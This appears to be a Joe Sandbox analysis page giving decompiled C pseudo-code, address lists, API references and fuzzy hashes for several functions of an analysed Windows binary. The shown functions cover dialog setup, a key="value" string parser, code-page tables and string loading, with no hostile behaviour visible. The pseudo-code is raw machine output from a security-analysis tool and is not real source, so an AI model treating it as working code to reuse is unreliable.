                              0x004095f8
                              0x004095fa
                              0x004095fe
                              0x00409602
                              0x00409609
                              0x0040960d
                              0x00409624
                              0x00409627
                              0x00409645
                              0x00409645
                              0x00409660
                              0x00409663
                              0x0040966a
                              0x00409672

                              APIs
                                • Part of subcall function 00413260: SetEvent.KERNEL32(00000000,00407649), ref: 00413263
                              • GetDlgItem.USER32 ref: 0040961A
                              • LoadIconA.USER32(00000000), ref: 00409634
                              • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00409645
                              • SetTimer.USER32(?,00000003,00000064,00000000), ref: 00409654
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: EventIconItemLoadMessageSendTimer
                              • String ID:
                              • API String ID: 2758541657-0
                              • Opcode ID: a2a1fe83cc9e0c6555ab30a5ba5d34d7e9637e7b1c96707fcad98147a719e390
                              • Instruction ID: 551790b6ae67963d7c94afa5d69916b6b09ae611f895d6b9f891aac7cfc7161a
                              • Opcode Fuzzy Hash: a2a1fe83cc9e0c6555ab30a5ba5d34d7e9637e7b1c96707fcad98147a719e390
                              • Instruction Fuzzy Hash: AF010830140B00AFD7219B21DD5AB66BBA1BF04721F008B2DE9A7959E0CB76B951CB48
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040D7CC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0040D7CC(void* __ecx) {
				signed int _t118;
				signed int _t129;
				signed int* _t130;
				signed int _t150;
				signed int _t151;
				signed int _t160;
				intOrPtr _t162;
				signed int* _t180;
				signed int _t181;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t195;
				signed int _t196;
				intOrPtr _t198;
				void* _t200;
				signed int* _t202;
				void* _t203;

				E00413954(E0041A61C, _t203);
				_t200 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) > 0x20 ||  *((intOrPtr*)(__ecx + 0x1c)) > 0x20) {
					L31:
					_t118 = 0;
				} else {
					E004032A8(_t203 - 0x28, 1);
					 *((intOrPtr*)(_t203 - 0x28)) = 0x41b748;
					_t150 = 0;
					 *(_t203 - 4) = 0;
					E0040D9F9(_t203 - 0x28,  *((intOrPtr*)(__ecx + 0x30)) +  *((intOrPtr*)(__ecx + 0x1c)));
					_t190 = 0;
					if( *((intOrPtr*)(_t200 + 0x1c)) <= 0) {
						L5:
						_t191 = 0;
						if( *((intOrPtr*)(_t200 + 0x30)) <= _t150) {
							L8:
							E0040D9F9(_t203 - 0x28,  *((intOrPtr*)(_t200 + 0x44)));
							_t192 = 0;
							if( *((intOrPtr*)(_t200 + 0x1c)) <= _t150) {
								L11:
								 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
								E004042AD(_t203 - 0x28);
								_t160 = 0x20;
								memset(_t203 - 0xd0, 0, _t160 << 2);
								_t162 = 4;
								 *(_t203 - 0x38) = _t150;
								 *(_t203 - 0x34) = _t150;
								 *(_t203 - 0x30) = _t150;
								 *((intOrPtr*)(_t203 - 0x2c)) = 0;
								 *((intOrPtr*)(_t203 - 0x3c)) = 0x41b378;
								 *(_t203 - 4) = 1;
								 *(_t203 - 0x4c) = _t150;
								 *(_t203 - 0x48) = _t150;
								 *(_t203 - 0x44) = _t150;
								 *((intOrPtr*)(_t203 - 0x40)) = _t162;
								 *((intOrPtr*)(_t203 - 0x50)) = 0x41b378;
								 *(_t203 - 4) = 2;
								 *(_t203 - 0x10) = _t150;
								if( *((intOrPtr*)(_t200 + 8)) > _t150) {
									do {
										 *(_t203 - 0x14) = _t150;
										_t198 =  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0xc)) +  *(_t203 - 0x10) * 4));
										if( *((intOrPtr*)(_t198 + 0x14)) > _t150) {
											do {
												E004039DF(_t203 - 0x3c,  *(_t203 - 0x10));
												 *(_t203 - 0x14) =  *(_t203 - 0x14) + 1;
											} while ( *(_t203 - 0x14) <  *((intOrPtr*)(_t198 + 0x14)));
										}
										 *(_t203 - 0x14) = _t150;
										if( *((intOrPtr*)(_t198 + 0x18)) > _t150) {
											do {
												E004039DF(_t203 - 0x50,  *(_t203 - 0x10));
												 *(_t203 - 0x14) =  *(_t203 - 0x14) + 1;
											} while ( *(_t203 - 0x14) <  *((intOrPtr*)(_t198 + 0x18)));
										}
										 *(_t203 - 0x10) =  *(_t203 - 0x10) + 1;
									} while ( *(_t203 - 0x10) <  *((intOrPtr*)(_t200 + 8)));
								}
								_t195 = 0;
								if( *((intOrPtr*)(_t200 + 0x1c)) > _t150) {
									do {
										_t151 = 1;
										 *(_t203 +  *( *(_t203 - 0x30) +  *( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8) * 4) * 4 - 0xd0) =  *(_t203 +  *( *(_t203 - 0x30) +  *( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8) * 4) * 4 - 0xd0) | _t151 <<  *( *(_t203 - 0x44) + ( *((intOrPtr*)(_t200 + 0x20)) + _t195 * 8)[1] * 4);
										_t195 = _t195 + 1;
									} while (_t195 <  *((intOrPtr*)(_t200 + 0x1c)));
									_t150 = 0;
								}
								 *(_t203 - 4) = 1;
								E004042AD(_t203 - 0x50);
								 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
								E004042AD(_t203 - 0x3c);
								_t180 = _t203 - 0xd0;
								 *(_t203 - 0x14) = 0x20;
								do {
									 *(_t203 - 0x10) = _t150;
									_t202 = _t203 - 0xd0;
									do {
										_t129 =  *_t180;
										_t196 = 1;
										if((_t129 & _t196 <<  *(_t203 - 0x10)) != 0) {
											 *_t180 = _t129 |  *_t202;
										}
										 *(_t203 - 0x10) =  *(_t203 - 0x10) + 1;
										_t202 =  &(_t202[1]);
									} while ( *(_t203 - 0x10) < 0x20);
									_t180 =  &(_t180[1]);
									_t106 = _t203 - 0x14;
									 *_t106 =  *(_t203 - 0x14) - 1;
								} while ( *_t106 != 0);
								_t130 = _t203 - 0xd0;
								while(1) {
									_t181 = 1;
									if(( *_t130 & _t181 << _t150) != 0) {
										goto L31;
									}
									_t150 = _t150 + 1;
									_t130 =  &(_t130[1]);
									if(_t150 < 0x20) {
										continue;
									} else {
										_t118 = 1;
									}
									goto L32;
								}
								goto L31;
							} else {
								while(E0040DA1F(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x20)) + 4 + _t192 * 8))) == 0) {
									_t192 = _t192 + 1;
									if(_t192 <  *((intOrPtr*)(_t200 + 0x1c))) {
										continue;
									} else {
										goto L11;
									}
									goto L32;
								}
								goto L30;
							}
						} else {
							while(E0040DA1F(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x34)) + _t191 * 4))) == 0) {
								_t191 = _t191 + 1;
								if(_t191 <  *((intOrPtr*)(_t200 + 0x30))) {
									continue;
								} else {
									goto L8;
								}
								goto L32;
							}
							goto L30;
						}
					} else {
						while(E0040DA1F(_t203 - 0x28,  *((intOrPtr*)( *((intOrPtr*)(_t200 + 0x20)) + _t190 * 8))) == 0) {
							_t190 = _t190 + 1;
							if(_t190 <  *((intOrPtr*)(_t200 + 0x1c))) {
								continue;
							} else {
								goto L5;
							}
							goto L32;
						}
						L30:
						 *(_t203 - 4) =  *(_t203 - 4) | 0xffffffff;
						E004042AD(_t203 - 0x28);
						goto L31;
					}
				}
				L32:
				 *[fs:0x0] =  *((intOrPtr*)(_t203 - 0xc));
				return _t118;
			}





















                              0x0040d7d1
                              0x0040d7de
                              0x0040d7e7
                              0x0040d9e8
                              0x0040d9e8
                              0x0040d7f7
                              0x0040d7fc
                              0x0040d801
                              0x0040d80e
                              0x0040d816
                              0x0040d819
                              0x0040d81e
                              0x0040d823
                              0x0040d841
                              0x0040d841
                              0x0040d846
                              0x0040d864
                              0x0040d86a
                              0x0040d86f
                              0x0040d874
                              0x0040d893
                              0x0040d893
                              0x0040d89a
                              0x0040d8a3
                              0x0040d8aa
                              0x0040d8b3
                              0x0040d8b4
                              0x0040d8b7
                              0x0040d8ba
                              0x0040d8bd
                              0x0040d8c0
                              0x0040d8c3
                              0x0040d8ca
                              0x0040d8cd
                              0x0040d8d0
                              0x0040d8d3
                              0x0040d8d6
                              0x0040d8dc
                              0x0040d8e0
                              0x0040d8e3
                              0x0040d8e5
                              0x0040d8eb
                              0x0040d8ee
                              0x0040d8f4
                              0x0040d8f6
                              0x0040d8fc
                              0x0040d901
                              0x0040d907
                              0x0040d8f6
                              0x0040d90f
                              0x0040d912
                              0x0040d914
                              0x0040d91a
                              0x0040d91f
                              0x0040d925
                              0x0040d914
                              0x0040d92a
                              0x0040d930
                              0x0040d8e5
                              0x0040d935
                              0x0040d93a
                              0x0040d93c
                              0x0040d94a
                              0x0040d960
                              0x0040d962
                              0x0040d963
                              0x0040d968
                              0x0040d968
                              0x0040d96d
                              0x0040d971
                              0x0040d976
                              0x0040d97d
                              0x0040d982
                              0x0040d988
                              0x0040d98f
                              0x0040d98f
                              0x0040d992
                              0x0040d998
                              0x0040d99b
                              0x0040d99f
                              0x0040d9a4
                              0x0040d9a8
                              0x0040d9a8
                              0x0040d9aa
                              0x0040d9ad
                              0x0040d9b0
                              0x0040d9b6
                              0x0040d9b9
                              0x0040d9b9
                              0x0040d9b9
                              0x0040d9be
                              0x0040d9c4
                              0x0040d9c8
                              0x0040d9cd
                              0x00000000
                              0x00000000
                              0x0040d9cf
                              0x0040d9d0
                              0x0040d9d6
                              0x00000000
                              0x0040d9d8
                              0x0040d9d8
                              0x0040d9d8
                              0x00000000
                              0x0040d9d6
                              0x00000000
                              0x0040d876
                              0x0040d876
                              0x0040d88d
                              0x0040d891
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040d891
                              0x00000000
                              0x0040d876
                              0x0040d848
                              0x0040d848
                              0x0040d85e
                              0x0040d862
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040d862
                              0x00000000
                              0x0040d848
                              0x0040d825
                              0x0040d825
                              0x0040d83b
                              0x0040d83f
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040d83f
                              0x0040d9dc
                              0x0040d9dc
                              0x0040d9e3
                              0x00000000
                              0x0040d9e3
                              0x0040d823
                              0x0040d9ea
                              0x0040d9f0
                              0x0040d9f8

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $
                              • API String ID: 3519838083-227171996
                              • Opcode ID: f310208c7012b047481696f3de0866f141f831578990e3312a3a639e5dd044ff
                              • Instruction ID: b608afa5533618173c50a936dd0dc92eebd328cd23ff399218f1dfb4b0bc6294
                              • Opcode Fuzzy Hash: f310208c7012b047481696f3de0866f141f831578990e3312a3a639e5dd044ff
                              • Instruction Fuzzy Hash: 6A713571E0020A9FCB24DF99D481AAEB7B1FF48314F10457ED416B7691D734AA8ACF54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00403D5A Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 152COMMON
                              Download Yara Rule
                              C-Code - Quality: 89%
                              			E00403D5A(intOrPtr* __ecx, intOrPtr __edx) {
				void* __edi;
				void* _t69;
				signed int _t70;
				intOrPtr _t79;
				intOrPtr _t90;
				signed int _t91;
				char _t98;
				char _t116;
				intOrPtr* _t136;
				void* _t138;

				E00413954(E004194DC, _t138);
				_t136 = __ecx;
				 *((intOrPtr*)(_t138 - 0x20)) = __edx;
				E004042D6();
				 *((intOrPtr*)(_t138 - 0x10)) = 0;
				while(1) {
					L1:
					_t69 = E00403FE2(_t136, _t138 - 0x10);
					_t146 = _t69;
					if(_t69 == 0) {
						break;
					}
					E00402EE1(_t138 - 0x50);
					 *(_t138 - 4) = 0;
					E00402EE1(_t138 - 0x44);
					_t7 = _t138 - 0x14; // 0x414be4
					 *(_t138 - 4) = 1;
					E00403F3C(_t138 - 0x38,  *_t136 +  *((intOrPtr*)(_t138 - 0x10)));
					 *(_t138 - 4) = 2;
					if(E0040411F(_t138 - 0x38, _t138 - 0x50, _t146) == 0) {
						L26:
						E00403A9C( *((intOrPtr*)(_t138 - 0x38)));
						E00403A9C( *((intOrPtr*)(_t138 - 0x44)));
						E00403A9C( *((intOrPtr*)(_t138 - 0x50)));
						L28:
						_t70 = 0;
						__eflags = 0;
						L29:
						 *[fs:0x0] =  *((intOrPtr*)(_t138 - 0xc));
						return _t70;
					}
					_t15 = _t138 - 0x14; // 0x414be4
					_t79 =  *_t15;
					if(_t79 == 0) {
						goto L26;
					}
					 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + _t79;
					if(E00403FE2(_t136, _t138 - 0x10) == 0 ||  *((char*)( *_t136 +  *((intOrPtr*)(_t138 - 0x10)))) != 0x3d) {
						goto L26;
					} else {
						 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + 1;
						if(E00403FE2(_t136, _t138 - 0x10) == 0 ||  *((char*)( *_t136 +  *((intOrPtr*)(_t138 - 0x10)))) != 0x22) {
							goto L26;
						} else {
							 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + 1;
							 *((intOrPtr*)(_t138 - 0x2c)) = 0;
							 *((intOrPtr*)(_t138 - 0x28)) = 0;
							 *((intOrPtr*)(_t138 - 0x24)) = 0;
							E0040243E(_t138 - 0x2c, 3);
							 *(_t138 - 4) = 3;
							while( *((intOrPtr*)(_t138 - 0x10)) <  *((intOrPtr*)(_t136 + 4))) {
								_t90 =  *_t136;
								_t116 =  *((intOrPtr*)(_t90 +  *((intOrPtr*)(_t138 - 0x10))));
								 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + 1;
								 *((char*)(_t138 - 0x1c)) = _t116;
								if(_t116 == 0x22) {
									_t91 = E0040411F(_t138 - 0x2c, _t138 - 0x44, __eflags);
									__eflags = _t91;
									if(_t91 == 0) {
										break;
									}
									_push(_t138 - 0x50);
									E004040BE( *((intOrPtr*)(_t138 - 0x20)), 0);
									E00403A9C( *((intOrPtr*)(_t138 - 0x2c)));
									E00403A9C( *((intOrPtr*)(_t138 - 0x38)));
									 *(_t138 - 4) =  *(_t138 - 4) | 0xffffffff;
									E0040213F(_t138 - 0x50);
									goto L1;
								}
								if(_t116 != 0x5c) {
									_push( *((intOrPtr*)(_t138 - 0x1c)));
								} else {
									_t98 =  *((intOrPtr*)(_t90 +  *((intOrPtr*)(_t138 - 0x10))));
									 *((intOrPtr*)(_t138 - 0x10)) =  *((intOrPtr*)(_t138 - 0x10)) + 1;
									 *((char*)(_t138 - 0x18)) = _t98;
									if(_t98 == 0x22) {
										_push(0x22);
									} else {
										if(_t98 == 0x5c) {
											_push(0x5c);
										} else {
											if(_t98 == 0x6e) {
												_push(0xa);
											} else {
												if(_t98 == 0x74) {
													_push(9);
												} else {
													E00401EE5(_t138 - 0x2c, 0x5c);
													_push( *((intOrPtr*)(_t138 - 0x18)));
												}
											}
										}
									}
								}
								E00401EE5(_t138 - 0x2c);
							}
							E00403A9C( *((intOrPtr*)(_t138 - 0x2c)));
							E00403A9C( *((intOrPtr*)(_t138 - 0x38)));
							E00403A9C( *((intOrPtr*)(_t138 - 0x44)));
							E00403A9C( *((intOrPtr*)(_t138 - 0x50)));
							goto L28;
						}
					}
				}
				_t70 = 1;
				goto L29;
			}













                              0x00403d5f
                              0x00403d68
                              0x00403d6d
                              0x00403d70
                              0x00403d77
                              0x00403d7a
                              0x00403d7a
                              0x00403d7f
                              0x00403d84
                              0x00403d86
                              0x00000000
                              0x00000000
                              0x00403d8f
                              0x00403d97
                              0x00403d9a
                              0x00403da1
                              0x00403da8
                              0x00403db5
                              0x00403dc0
                              0x00403dcb
                              0x00403eec
                              0x00403eef
                              0x00403ef7
                              0x00403eff
                              0x00403f2c
                              0x00403f2c
                              0x00403f2c
                              0x00403f2e
                              0x00403f33
                              0x00403f3b
                              0x00403f3b
                              0x00403dd1
                              0x00403dd1
                              0x00403dd6
                              0x00000000
                              0x00000000
                              0x00403ddc
                              0x00403deb
                              0x00000000
                              0x00403e00
                              0x00403e00
                              0x00403e0f
                              0x00000000
                              0x00403e24
                              0x00403e24
                              0x00403e2c
                              0x00403e2f
                              0x00403e32
                              0x00403e35
                              0x00403e3a
                              0x00403e3e
                              0x00403e4a
                              0x00403e4f
                              0x00403e52
                              0x00403e58
                              0x00403e5b
                              0x00403eb0
                              0x00403eb5
                              0x00403eb7
                              0x00000000
                              0x00000000
                              0x00403ebf
                              0x00403ec0
                              0x00403ec8
                              0x00403ed0
                              0x00403ed5
                              0x00403ede
                              0x00000000
                              0x00403ede
                              0x00403e60
                              0x00403ea5
                              0x00403e62
                              0x00403e65
                              0x00403e68
                              0x00403e6d
                              0x00403e70
                              0x00403e99
                              0x00403e72
                              0x00403e74
                              0x00403e95
                              0x00403e76
                              0x00403e78
                              0x00403e91
                              0x00403e7a
                              0x00403e7c
                              0x00403e8d
                              0x00403e7e
                              0x00403e83
                              0x00403e88
                              0x00403e88
                              0x00403e7c
                              0x00403e78
                              0x00403e74
                              0x00403e70
                              0x00403e9e
                              0x00403e9e
                              0x00403f0c
                              0x00403f14
                              0x00403f1c
                              0x00403f24
                              0x00000000
                              0x00403f29
                              0x00403e0f
                              0x00403deb
                              0x00403ee8
                              0x00000000

                              APIs
                              • __EH_prolog.LIBCMT ref: 00403D5F
                                • Part of subcall function 00403F3C: __EH_prolog.LIBCMT ref: 00403F41
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: > @$KA
                              • API String ID: 3519838083-301980584
                              • Opcode ID: f9624756dcd051103a0faf5414ab264e1043146aad46313972ce47ae36e47b30
                              • Instruction ID: 0797aa4f2666763f951e0621ef07ec53320c6840b80f95fc9e8c0876c74f2843
                              • Opcode Fuzzy Hash: f9624756dcd051103a0faf5414ab264e1043146aad46313972ce47ae36e47b30
                              • Instruction Fuzzy Hash: 27517D30D0020A9ACF15EF95C855AEEBF7AAF5430AF10452FE452372D2DB795B06CB89
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041808D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                              Download Yara Rule
                              C-Code - Quality: 92%
                              			E0041808D(void* __ebx, void* __edi) {
				char _v17;
				signed char _v18;
				struct _cpinfo _v24;
				char _v280;
				char _v536;
				char _v792;
				char _v1304;
				void* _t43;
				char _t44;
				signed char _t45;
				void* _t55;
				signed int _t56;
				signed char _t64;
				intOrPtr* _t66;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				signed char _t76;
				signed char _t77;
				signed char* _t78;
				void* _t81;
				void* _t87;
				void* _t88;

				if(GetCPInfo( *0x4256c8,  &_v24) == 1) {
					_t44 = 0;
					do {
						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
						_t44 = _t44 + 1;
					} while (_t44 < 0x100);
					_t45 = _v18;
					_v280 = 0x20;
					if(_t45 == 0) {
						L9:
						E00418A6C(1,  &_v280, 0x100,  &_v1304,  *0x4256c8,  *0x4258e4, 0);
						E0041881D( *0x4258e4, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x4256c8, 0);
						E0041881D( *0x4258e4, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x4256c8, 0);
						_t55 = 0;
						_t66 =  &_v1304;
						do {
							_t76 =  *_t66;
							if((_t76 & 0x00000001) == 0) {
								if((_t76 & 0x00000002) == 0) {
									 *(_t55 + 0x4256e0) =  *(_t55 + 0x4256e0) & 0x00000000;
									goto L16;
								}
								 *(_t55 + 0x4257e1) =  *(_t55 + 0x4257e1) | 0x00000020;
								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
								L12:
								 *(_t55 + 0x4256e0) = _t77;
								goto L16;
							}
							 *(_t55 + 0x4257e1) =  *(_t55 + 0x4257e1) | 0x00000010;
							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
							goto L12;
							L16:
							_t55 = _t55 + 1;
							_t66 = _t66 + 2;
						} while (_t55 < 0x100);
						return _t55;
					}
					_t78 =  &_v17;
					do {
						_t68 =  *_t78 & 0x000000ff;
						_t56 = _t45 & 0x000000ff;
						if(_t56 <= _t68) {
							_t81 = _t87 + _t56 - 0x114;
							_t70 = _t68 - _t56 + 1;
							_t71 = _t70 >> 2;
							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
							_t88 = _t88 + 0x18;
						}
						_t78 =  &(_t78[2]);
						_t45 =  *((intOrPtr*)(_t78 - 1));
					} while (_t45 != 0);
					goto L9;
				}
				_t43 = 0;
				do {
					if(_t43 < 0x41 || _t43 > 0x5a) {
						if(_t43 < 0x61 || _t43 > 0x7a) {
							 *(_t43 + 0x4256e0) =  *(_t43 + 0x4256e0) & 0x00000000;
						} else {
							 *(_t43 + 0x4257e1) =  *(_t43 + 0x4257e1) | 0x00000020;
							_t64 = _t43 - 0x20;
							goto L22;
						}
					} else {
						 *(_t43 + 0x4257e1) =  *(_t43 + 0x4257e1) | 0x00000010;
						_t64 = _t43 + 0x20;
						L22:
						 *(_t43 + 0x4256e0) = _t64;
					}
					_t43 = _t43 + 1;
				} while (_t43 < 0x100);
				return _t43;
			}


























                              0x004180aa
                              0x004180b0
                              0x004180b7
                              0x004180b7
                              0x004180be
                              0x004180bf
                              0x004180c3
                              0x004180c6
                              0x004180cf
                              0x00418108
                              0x00418127
                              0x0041814b
                              0x00418173
                              0x0041817b
                              0x0041817d
                              0x00418183
                              0x00418183
                              0x00418189
                              0x004181a4
                              0x004181b6
                              0x00000000
                              0x004181b6
                              0x004181a6
                              0x004181ad
                              0x00418199
                              0x00418199
                              0x00000000
                              0x00418199
                              0x0041818b
                              0x00418192
                              0x00000000
                              0x004181bd
                              0x004181bd
                              0x004181bf
                              0x004181c0
                              0x00000000
                              0x00418183
                              0x004180d3
                              0x004180d6
                              0x004180d6
                              0x004180d9
                              0x004180de
                              0x004180e2
                              0x004180e9
                              0x004180f1
                              0x004180fb
                              0x004180fb
                              0x004180fb
                              0x004180fe
                              0x004180ff
                              0x00418102
                              0x00000000
                              0x00418107
                              0x004181c6
                              0x004181cd
                              0x004181d0
                              0x004181ee
                              0x00418203
                              0x004181f5
                              0x004181f5
                              0x004181fe
                              0x00000000
                              0x004181fe
                              0x004181d7
                              0x004181d7
                              0x004181e0
                              0x004181e3
                              0x004181e3
                              0x004181e3
                              0x0041820a
                              0x0041820b
                              0x00418211

                              APIs
                              • GetCPInfo.KERNEL32(?,00000000), ref: 004180A1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.491135742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491212511.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491315115.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491346410.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491363516.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.491391269.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                              Similarity
                              • API ID: Info
                              • String ID: $
                              • API String ID: 1807457897-3032137957
                              • Opcode ID: 8b363f32da595bfb59a3e5cf7fceda2159d83bff833a4ab1ae99a185f1cff2df
                              • Instruction ID: d0f9309d8466ab513fef0fe96190925d4c3a9a36aebfd3e00fd14af349a29a6b
                              • Opcode Fuzzy Hash: 8b363f32da595bfb59a3e5cf7fceda2159d83bff833a4ab1ae99a185f1cff2df
                              • Instruction Fuzzy Hash: 18417C322046586EEB22DB14CC4DFFB7FA8DB06700F9400EAD549C7162CA794985CBAA
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00405F5E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                              Download Yara Rule
                              C-Code - Quality: 81%
                              			E00405F5E(intOrPtr __ecx, struct HINSTANCE__* __edx, void* __esi) {
				signed int _t38;
				WCHAR* _t54;
				WCHAR* _t58;
				int _t61;
				void* _t63;
				intOrPtr _t68;

				E00413954(E00419764, _t63);
				_t68 =  *0x423148; // 0x1
				 *(_t63 - 0x14) = __edx;
				 *((intOrPtr*)(_t63 - 0x10)) = __ecx;
				 *((intOrPtr*)(_t63 - 0x18)) = 0;
				if(_t68 == 0) {
					_push( *(_t63 + 8));
					E00405EBC(_t63 - 0x30, __edx);
					 *((intOrPtr*)(_t63 - 4)) = 1;
					E00401A03();
					_push( *((intOrPtr*)(_t63 - 0x30)));
				} else {
					 *(_t63 - 0x24) = 0;
					 *(_t63 - 0x20) = 0;
					 *((intOrPtr*)(_t63 - 0x1c)) = 0;
					E00402170(_t63 - 0x24, 3);
					 *((intOrPtr*)(_t63 - 4)) = 0;
					_t61 = 0x100;
					do {
						_t61 = _t61 + 0x100;
						_t9 = _t61 - 1; // -1
						_t36 = _t9;
						if(_t9 >=  *((intOrPtr*)(_t63 - 0x1c))) {
							E00402170(_t63 - 0x24, _t36);
						}
						_t14 = _t63 - 0x14; // 0x414be4
					} while (_t61 - LoadStringW( *_t14,  *(_t63 + 8),  *(_t63 - 0x24), _t61) <= 1);
					_t54 =  *(_t63 - 0x24);
					_t38 = 0;
					if( *_t54 != 0) {
						_t58 = _t54;
						do {
							_t38 = _t38 + 1;
							_t58 =  &(_t58[1]);
						} while ( *_t58 != 0);
					}
					_t54[_t38] = 0;
					 *(_t63 - 0x20) = _t38;
					E00401CE1( *((intOrPtr*)(_t63 - 0x10)), _t63 - 0x24);
					_push( *(_t63 - 0x24));
				}
				E00403A9C();
				 *[fs:0x0] =  *((intOrPtr*)(_t63 - 0xc));
				return  *((intOrPtr*)(_t63 - 0x10));
			}









                              0x00405f63
                              0x00405f6e
                              0x00405f74
                              0x00405f77
                              0x00405f7a
                              0x00405f7d
                              0x00405ff8
                              0x00405ffe
                              0x00406008
                              0x0040600f
                              0x00406014
                              0x00405f7f
                              0x00405f85
                              0x00405f88
                              0x00405f8b
                              0x00405f8e
                              0x00405f93
                              0x00405f96
                              0x00405f9b
                              0x00405f9b
                              0x00405fa1
                              0x00405fa1
                              0x00405fa7
                              0x00405fad
                              0x00405fad
                              0x00405fb9
                              0x00405fc6
                              0x00405fcb
                              0x00405fce
                              0x00405fd4
                              0x00405fd6
                              0x00405fd8
                              0x00405fd8
                              0x00405fda
                              0x00405fdb
                              0x00405fd8
                              0x00405fe0
                              0x00405fe7
                              0x00405fee
                              0x00405ff3
                              0x00405ff3
                              0x00406017
                              0x00406024
                              0x0040602c

                              APIs
                              • __EH_prolog.LIBCMT ref: 00405F63
                              • LoadStringW.USER32(KA,?,?,00000000), ref: 00405FBC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.491152909.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
